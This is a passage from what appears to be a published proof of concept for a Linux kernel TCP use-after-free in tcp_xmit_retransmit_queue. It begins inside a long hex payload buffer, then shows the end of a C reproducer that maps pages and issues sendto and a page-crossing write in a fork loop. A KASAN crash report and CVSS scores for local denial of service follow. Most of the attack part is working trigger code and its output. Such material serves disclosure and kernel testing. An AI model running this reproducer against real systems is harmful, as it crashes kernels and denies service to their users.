x8a\x28\xb6\x30\x99\x79\xd2\x42\xbe\x53\x32\x84\x0c\x17\xdc\xc9\x1c\xa9\xed\x26\x20\x69\xef\x6d\xc4\xa4\xad\xe5\x68\xec\x52\xe8\x51\x3f\xb2\x52\xbc\x6f\x84\x26\x41\xf9\x91\x22\x66\x89\xcc\x03\xa6\xa5\x7a\x07\xd7\x35\x92\x5e\xc1\xf9\x11\x1b\x4b\x6d\x50\x7b\x4f\x43\xca\x13\x37\xd2\x6d\xce\x81\xa8\x9b\x8b\x8c\x65\x75\x08\x97\x18\xb6\xd2\x2e\xd2\xe3\x31\x51\x2e\xb0\xb3\x04\x64\x71\xba\x05\x4b\x23\x91\x92\xfd\x4a\x1b\x6c\x35\xa5\x8f\xcb\xb5\xac\xd9\x40\xe5\x4b\x6b\x04\xe2\x2a\xab\xd9\x0d\xcf\x0b\x23\xfa\x1f\xcd\x4a\x46\xb0\x26\xc4\xb8\xae\x17\x82\x6c\x7f\x6f\xe6\x1a\x8c\x0d\x95\xdf\xe2\xc2\xd4\x5c\x85\x6d\x79\x3b\x8a\x6c\x51\xf3\x5f\x06\xdf\x07\x5b\x69\x8a\xde\x75\x59\x6d\x70\x99\x55\x09\x8f\xf8\xc0\x6f\x2e\xc3\x0f\x87\x1c\x79\xe8\x4b\xb0\x55\x51\xb2\xa3\x91\x9b\xb0\x89\x17\xad\x9b\x89\x81\x23\x12\xcb\x45\x8a\xd7\x2a\x0a\x19\x84\x7d\xb9\x64\xa6\x31\xa3\x48\x30\x3c\x01\x6b\x7c\x74\x20\xe6\x0b\xff\x2a\x0a\x66\x82\x00\x31\x01\xbc\xf8\x47\x02\xcc\x43\xbe\x6d\x0c\x0e\x4f\x59\x37\x4d\xcb\xc2\x37\xee\x5e\x1c\x2c\xf3\xda\xc8\xf8\xc9\x8c\xbc\xff\xd9\x8b\x8a\xee\x4e\xab\x19\x8f\xb6\xb4\xe7\x0a\xda\x9c\x5c\x00\xc3\x26\x87\x63\xb0\xa9\x1b\x31\x62\xef\x04\x10\x68\x6c\x3c\xd1\xba\x73\xc1\xaa\xf2\xe4\xbd\x29\xdb\x2c\xe3\x69\xf0\x34\x8d\xd3\x6b\x6e\x59\x42\x6f\x28\x3d\x2f\x83\x27\x48\xc0\xb7\x82\xd3\x95\x96\x0c\xdf\x22\xc7\xce\x77\xab\x09\x4c\xad\xab\
x0d\x70\xee\x4d\xea\xb3\x63\x62\x04\x6f\xd7\x68\x2e\x86\x7c\xac\xd4\xc2\x6e\x09\xdf\xf0\xbe\x8c\x71\xd9\xa8\x82\xf8\xd2\x14\x70\xb7\xd0\x40\x12\x5e\xa7\xec\xab\x1a\x13\x87\x0b\x6e\x28\x59\x76\x01\xb2\x3f\x64\x62\x35\xb3\xff\x0d\x8a\x3d\x6b\x5a\xd3\x9e\x59\x14\x6d\x19\x4c\x99\x04\x75\xe4\x04\xe3\xf2\x8a\x19\x77\x06\xdd\x5f\x2e\x25\x2c\xa3\xb5\x52\xa6\xfa\x2b\x84\x35\xdc\x56\x55\x02\x63\x79\x81\x3b\x27\x82\x41\x92\x19\xb3\xe3\x63\xce\xb5\x0c\x1a\x15\x15\x38\x2a\x52\xf0\xdd\x58\x3d\xa4\x7f\x5b\xb9\xa3\x9c\x90\x14\xf9\x2c\x2b\xaa\x1e\x0d\xfd\xf6\x93\x7e\xbc\xc3\x59\x11\x6e\xd9\x52\x1e\xd0\xea\x0b\x55\x0b\x71\xfa\x69\xda\x9d\x35\x10\x70\x32\x68\xe8\xde\x47\x74\x1f\xc6\x60\x86\xbd\x15\x1c\x6b\x52\xeb\xe4\x04\x0f\x8c\x70\x2f\x8d\x6d\x7e\x5f\xfd\xe7\xd1\x87\x80\x76\xd8\x7a\x2c\xbf\xb2\x98\x12\x83\x81\x94\x11\x7d\x1c\x90\xfd\xf0\xdc\xe6\x9d\xee\x76\xde\x50\xcb\x97\x25\xca\x88\xd8\x70\x97\x40\x25\x94\xc5\xfe\x8b\x44\x05\x8d\x6e\x7f\xab\xc3\x27\xd8\x0e\x4a\x30\xb5\xfb\x95\xf8\x34\x75\x01\x1f\xe6\xac\x81\x1b\x13\x63\xb7\x60\xb8\x1c\x3b\xda\x07\x26\x9e\xfd\xeb\x7f\x43\x46\x93\x75\x63\xdc\xa7\xe9\xc1\x8f\xa9\x06\x96\xe7\x10\x87\xb4\x32\x4a\x30\x69\xd2\xf4\x2b\x5d\x76\xa3\x94\x6b\x72\xd9\xc6\xfa\x6a\x49\x12\xc7\xc2\x74\x3f\xc4\x39\x9f\xa0\x7e\xcd\x81\x9c\x54\x0f\x14\xce\xd3\x7e\xd8\xe8\xd2\xc2\x24\x2e\xc5\x1b\x58\xf8\x8e\xe6\xaa\x16\x69\x6c\x4b\x40\x86\x1a\x1a\xad\x11\x6f\x90\x48\x68\x93\xb1\x8f\xbd\xaf\x8d\x00\x09\x5e\xf4\xe3\x03\x59\xff\x8f\xf5\xf0\xe2\xa1\x79\x93\xf5\x76\xcb\x56\x93\xb8\xe6\x22\xe5\x69\x90\x3d\x0f\x9b\x57\x86\x19\xf7\x63\xd5\x2c\xfe\xad\x63\x60\x9e\x9e\x29\x04\xe9\x4d\xb6\xd9\xb1\xdb\x42\x2d\x8b\x8d\x6d\xdd\xae\x0b\xca\x58\x38\xf4\x30\xad\xae\xa3\x3d\x64\x47\xe0\x77\xc3\xed\xc8\xe0\x7d\x3c\x6c\xda\xbd\x47\x5e\x37\xb4\xe4\xb8\x1c\x69\x16\xb6\xd5\x8b\x9a\x15\xfa\x6b\x21\x88\x74\xbb\xdf\xe3\xbe\x31\x02\x8e\x82\x81\x10\x98\x24\x74\x04\xad\xe3\xc5\x63\x57\x0d\x58\xbe\x1c\x97\xa1\x0d\xb6\x55\x83\x18\x41\x37\xa7\x1b\x51\x37\x13\x99\xeb\x6f\xe3\x70\xc2\x4a\x8c\x17\xc6\
x30\x8d\x01\xfe\xd4\x71\x4c\xee\x82\x94\xe4\x1d\x9a\x8a\xed\x48\x61\xba\x6c\x63\x5f\x3b\x13\x9f\x5b\xe4\x0b\x2c\x44\x1c\xb7\xf6\xc7\x64\xf6\x74\x4a\x16\x7a\x35\xf7\x2e\x9d\x4f\x00\x38\xa7\xad\xe7\x17\x0c\xb7\x3f\x02\x41\xe9\xa3\x37\x5b\x98\xd5\x0f\xc6\xe6\xd1\x38\x4e\x87\x4f\x2f\x02\xa1\x27\x4d\xb2\x03\xfc\x50\x48\xaa\x33\x92\xe1\x10\xa6\x0b\xb0\x20\x7c\x57\xd4\x85\x55\x51\x6e\x7e\xdf\xa2\x46\xf5\x94\x93\x03\x02\xdb\x94\x55\x23\xd9\x5b\x99\x2b\x3a\x7e\x7d\xb1\x80\x47\xf9\x77\xee\x0f\x5e\x63\x7f\x1e\x96\xdf\xf9\x1c\x81\x55\xdd\x02\x81\x87\xc8\x04\x52\x59\x49\xd4\x08\xd5\x73\x43\x3f\xd2\xf9\xa9\xf0\xd7\xb9\x97\x86\x9c\x0a\xc6\x7d\x5a\x98\x88\x2b\x0b\x38\xa1\xcb\xf8\x71\xc7\x5d\xfe\xba\xd0\x26\x4b\xdf\xb8\x11\x8f\x71\x60\x68\xc7\x82\xd0\x36\x97\x23\x56\xda\x52\x58\x90\x0a\x42\x0b\xfc\xf8\xc9\x1f\x36\x7f\x9f\xe5\x5b\xf8\x6e\xe1\x78\x47\xfe\x6b\x00\xcd\xe5\x6b\xe2\xa6\xaf\x2b\x33\x95\x73\x79\x52\x13\x1c\x87\x3d\x8d\xbc\x32\x1e\x11\x25\x91\x51\xa0\xaf\xcc\xf1\xc3\x5a\xea\x8b\x15\x82\x76\xa9\x0f\xe7\x08\x73\x53\x02\x4c\x8c\xb2\x8d\x4b\xa0\xed\x37\x20\x7f\x54\xa2\x2a\x33\x6b\x5f\x3a\x4f\x54\x61\x85\x91\x86\x68\x5a\xd4\x80\xc9\x21\xa9\x16\x5d\x77\xee\x28\xeb\xc2\x5c\x22\xe4\x27\xdb\x5b\xe4\xa7\x70\xdc\x6a\x8e\xd9\xe7\x77\x09\x5b\x94\x97\xc6\xf4\x1f\x7a\x35\x9e\x26\x1e\x8b\x37\xe3\xa4\xdc\x0a\x8a\x19\x59\x3a\x77\x81\x2d\x9b\x0e\x51\x2b\xd7\xc5\xbc\x07\xfa\xf3\x29\x79\x35\x98\xe3\xb8\xf7\xe5\x40\xdf\xa8\x93\x00\xf6\x53\x8c\xcc\x33\xdf\x0e\x35\x3e\x72\x8d\x48\x85\x05\x40\x43\xe1\x13\xd6\x4a\x95\x50\xf8\x32\xca\xc3\x1c\x28\xd4\x41\x15\x64\xc1\x08\xfb\x2c\xc2\x1f\x79\x30\x58\xaa\x7c\x0d\x83\x8e\x87\xf4\x2e\xa3\xfc\xeb\xd0\xdb\xcc\x15\xcd\x88\x99\x41\x75\x13\xc1\x0c\x53\x96\xfe\xff\xeb\x87\x6a\x04\x75\xf2\x98\x40\x7e\xc7\x4e\x47\x63\x31\x2f\xb2\xa2\x88\x30\xca\x49\xfb\x57\x40\x65\x8c\xc9\x80\x20\xb9\xc9\xfc\x79\x12\x8d\xe6\x24\x24\x5f\x38\x47\x3c\x93\x64\x41\x9a\xf2\xe8\xab\xc1\xaf\x13\x95\x5c\x26\x4e\x02\x99\x5f\x6a\xe3\xd4\x91\x0a\xf5\x06\x3a\x2d\xc9\x22\x96\x6b\xa0\x77\x00\x77\
x7c\x26\xdc\xb6\xc1\x1b\x6c\xc8\xfe\x43\x2c\xe2\xdc\x58\x7e\x30\x38\x98\x97\xdf\xda\xae\x9d\x40\x94\xb7\x16\x91\x66\x94\x6c\x2a\x50\x39\x69\xce\xb4\x5c\xec\x2e\x60\x71\x92\xa3\x14\x1f\x08\x70\xcb\x9c\x47\x5b\xf3\xf4\xea\x7a\x34\x43\x32\x8b\x19\x57\xd2\xe7\x1c\xc5\xeb\xa5\x66\x37\x73\x80\x59\xac\x1e\xc0\x2f\xf1\x30\xf4\xd0\xc7\x78\x2b\x38\xd3\xab\x74\xfd\x4d\xdf\x5e\xc5\xa7\x89\x1b\xb7\x76\xf5\xf9\xfd\xca\xfc\xc2\x0d", 4096);
        r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
        // Third fixed mapping: one page at 0x20022000..0x20023000.
        r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        // A 0x28-byte record is assembled at 0x20022fdd, only 0x23 bytes
        // before the end of that page, and write() is asked for all 0x28
        // bytes: the last 5 lie in the unmapped page at 0x20023000, so the
        // kernel's copy from user space faults part-way through. The "Freed"
        // stack in the KASAN report below ends in tcp_sendmsg, which is
        // consistent with that fault path releasing the skb that the later
        // ACK processing still references — inferred, not shown by this code.
        *(uint32_t*)0x20022fdd = (uint32_t)0x28;
        *(uint32_t*)0x20022fe1 = (uint32_t)0x400;
        *(uint64_t*)0x20022fe5 = (uint64_t)0x0;
        *(uint64_t*)0x20022fed = (uint64_t)0x8ab;
        *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
        *(uint16_t*)0x20022ffd = (uint16_t)0x5;
        r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
        // No exit here: the child falls through to the next loop iteration.
        } else if (pid > 0) {
            // Parent: block until this child is gone, then fork the next one.
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
        } else {
            // fork() failed (e.g. EAGAIN once the process chain hits the
            // per-user process limit); give up.
            printf("fork failed\n");
            exit(1);
        }
    }
    return 0;
}


// KASAN report on v4.8-rc1; an equivalent report is produced on master

/*
[   21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B           4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.518203] ==================================================================
*/

5.5 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

4.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:N/I:N/A:C